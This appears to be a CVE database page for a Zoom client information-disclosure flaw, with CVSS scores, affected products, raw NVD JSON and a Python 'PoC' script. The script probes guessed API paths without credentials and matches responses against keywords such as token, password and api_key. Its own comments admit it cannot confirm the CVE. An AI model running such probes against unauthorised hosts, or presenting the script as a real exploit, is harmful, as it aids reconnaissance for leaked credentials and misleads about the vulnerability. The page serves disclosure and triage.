Security Vulnerability Report
CVE-2025-62483 CVSS 5.3 MEDIUM

CVE-2025-62483

Published: 2025-11-13 15:15:52
Last Modified: 2026-01-13 20:50:11

Description

Improper removal of sensitive information in certain Zoom Clients before version 6.5.10 may allow an unauthenticated user to conduct a disclosure of information via network access.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
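CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Note: the score and vector shown here are the record's Secondary assessment. The raw JSON below also carries a Primary assessment of 7.5 HIGH (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N), which rates the confidentiality impact High rather than Low.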

Configurations (Affected Products)

cpe:2.3:a:zoom:meeting_software_development_kit:*:*:*:*:*:linux:*:* - VULNERABLE
cpe:2.3:a:zoom:meeting_software_development_kit:*:*:*:*:*:macos:*:* - VULNERABLE
cpe:2.3:a:zoom:meeting_software_development_kit:*:*:*:*:*:windows:*:* - VULNERABLE
cpe:2.3:a:zoom:rooms:*:*:*:*:*:iphone_os:*:* - VULNERABLE
cpe:2.3:a:zoom:rooms:*:*:*:*:*:macos:*:* - VULNERABLE
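Zoom Clients < 6.5.10
Note: the list above is partial. The raw JSON below also marks Zoom Rooms for Windows, Zoom Rooms Controller (Linux, macOS, Windows) and Zoom Workplace Desktop (Linux, macOS, Windows) as vulnerable before 6.5.10, and Zoom Workplace VDI for Windows as vulnerable before 6.3.14 and from 6.4.10 up to, but not including, 6.4.12.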

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
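# CVE-2025-62483 - Zoom Client Information Disclosure: heuristic HTTP check
# The advisory text for this CVE (CWE-212, Zoom clients before 6.5.10) does not
# name any HTTP endpoint, so this script can neither confirm nor rule out the
# issue. It only reports unauthenticated responses that contain credential-like
# keywords. Whether a client is affected is decided by its installed version.
# Note: This is for educational and authorized testing purposes only

import requests
import json
import argparse
from urllib.parse import urljoin

# Generic paths probed by the check. They are guesses, not endpoints taken from
# the advisory, so a hit on one of them is not evidence of CVE-2025-62483.
_ENDPOINTS = (
    "/v2/users/me",
    "/v2/meetings",
    "/v2/users/me/settings",
    "/v2/report/meetings",
    "/v1/client/config",
    "/v1/user/info",
)

# Substrings that make a response worth a manual look. They are matched
# case-insensitively anywhere in the body, so ordinary pages (a login form,
# API documentation) can match as well.
_SENSITIVE_PATTERNS = (
    "token",
    "secret",
    "password",
    "credential",
    "auth",
    "session",
    "private_key",
    "api_key",
)


def test_zoom_info_disclosure(target_url, cve_id="CVE-2025-62483", *, verify_tls=True):
    """Probe a target for unauthenticated responses containing sensitive keywords.

    Each path in ``_ENDPOINTS`` is requested without credentials. An endpoint is
    recorded only when the server answers with a 2xx status AND the body
    contains at least one keyword from ``_SENSITIVE_PATTERNS``. The result is a
    triage hint for manual review, not a confirmation of the CVE.

    Args:
        target_url: Base URL of the host to check. Because every probed path
            starts with "/", ``urljoin`` discards any path already present here.
        cve_id: Identifier used in the printed banner only.
        verify_tls: When True (default) the server certificate is validated, so
            a reported response is known to come from the named host. Pass
            False only for hosts with self-signed certificates.

    Returns:
        A list of dicts with the keys ``endpoint``, ``status_code``,
        ``sensitive_data_leaked`` (the matched keywords) and ``vulnerable``.
        ``vulnerable`` is kept for compatibility and is always True for a
        recorded entry; it means "matched the heuristic", nothing more.
    """
    print(f"[*] Testing for {cve_id}")
    print(f"[*] Target: {target_url}")

    results = []

    for endpoint in _ENDPOINTS:
        full_url = urljoin(target_url, endpoint)
        try:
            # Redirects are not followed: a bounce to a login page would come
            # back as 200 with "password"/"session" in the HTML and be reported
            # as a leak.
            response = requests.get(
                full_url,
                timeout=10,
                verify=verify_tls,
                allow_redirects=False,
            )
        except requests.exceptions.RequestException as e:
            print(f"[-] Error testing {endpoint}: {e}")
            continue

        response_text = response.text.lower()
        found_patterns = [p for p in _SENSITIVE_PATTERNS if p in response_text]

        # The earlier condition (`found_patterns or status_code != 401`) flagged
        # every 404, 403 and 500 as vulnerable. A finding now needs a successful
        # response together with a keyword match.
        if 200 <= response.status_code < 300 and found_patterns:
            results.append({
                "endpoint": endpoint,
                "status_code": response.status_code,
                "sensitive_data_leaked": found_patterns,
                "vulnerable": True,
            })
            print(f"[!] Potential vulnerability found at {endpoint}")
            print(f"    Status: {response.status_code}")
            print(f"    Leaked patterns: {found_patterns}")

    if not results:
        print("[*] No obvious information disclosure detected")
        print("[*] Manual verification recommended")

    # Either outcome leaves the real question open: is the installed client
    # older than the fixed version listed in the vendor advisory?
    print(f"[*] This check does not confirm or rule out {cve_id}; "
          "compare the installed client version with the vendor advisory")

    return results


if __name__ == "__main__":
    # The description used to be f"PoC for {CVE-2025-62483}", which evaluates
    # CVE - 2025 - 62483 as an expression and raises NameError at start-up.
    parser = argparse.ArgumentParser(description="PoC for CVE-2025-62483")
    parser.add_argument("-t", "--target", required=True, help="Target Zoom server URL")
    parser.add_argument(
        "-k", "--insecure",
        action="store_true",
        help="Skip TLS certificate verification (hosts with self-signed certificates)",
    )
    args = parser.parse_args()

    test_zoom_info_disclosure(args.target, verify_tls=not args.insecure)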

References

Vendor advisory: https://www.zoom.com/en/trust/security-bulletin/zsb-25047

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62483", "sourceIdentifier": "[email protected]", "published": "2025-11-13T15:15:51.860", "lastModified": "2026-01-13T20:50:10.990", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper removal of sensitive information in certain Zoom Clients before version 6.5.10 may allow an unauthenticated user to conduct a disclosure of information via network access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-212"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zoom:meeting_software_development_kit:*:*:*:*:*:linux:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "81E0F90E-35B6-464F-9BE3-164BA24D2009"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:meeting_software_development_kit:*:*:*:*:*:macos:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "6E806B61-C0EF-4A0E-9B7A-F5D27D173B32"}, {"vulnerable": true, 
"criteria": "cpe:2.3:a:zoom:meeting_software_development_kit:*:*:*:*:*:windows:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "851C9061-1A47-4521-9FD9-9933A5A7509A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:iphone_os:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "D2D51ECB-5A89-4C78-A30E-7B454D63B24F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:macos:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "8B3EA329-4800-4C0F-87AC-75C98EA4BC21"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:windows:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "FFBB7286-F0EF-4F07-B5CD-EF140843D636"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms_controller:*:*:*:*:*:linux:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "38D8F8A2-A530-4A22-99D2-1C385CDBC5F1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms_controller:*:*:*:*:*:macos:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "5129314C-E9A6-48A5-973D-4293E5362582"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms_controller:*:*:*:*:*:windows:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "5766D499-72EC-47FB-9EA0-F8239E8CD971"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:workplace_desktop:*:*:*:*:*:linux:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "08F19DBA-97B0-4FEB-BE40-35C58E25212E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:workplace_desktop:*:*:*:*:*:macos:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "E77D9B96-3C18-49F1-9119-30A154D6243D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:workplace_desktop:*:*:*:*:*:windows:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "366D7D39-E1C5-48C0-8F12-F4860FA5BD44"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:workplace_virtual_desktop_infrastructure:*:*:*:*:*:windows:*:*", "versionEndExcluding": "6.3.14", "matchCriteriaId": "5D61DBA7-2AFE-47E4-8A7E-3C8EE6696BF9"}, 
{"vulnerable": true, "criteria": "cpe:2.3:a:zoom:workplace_virtual_desktop_infrastructure:*:*:*:*:*:windows:*:*", "versionStartIncluding": "6.4.10", "versionEndExcluding": "6.4.12", "matchCriteriaId": "A57A2EE0-D00B-4266-B152-2439B8ED774A"}]}]}], "references": [{"url": "https://www.zoom.com/en/trust/security-bulletin/zsb-25047", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}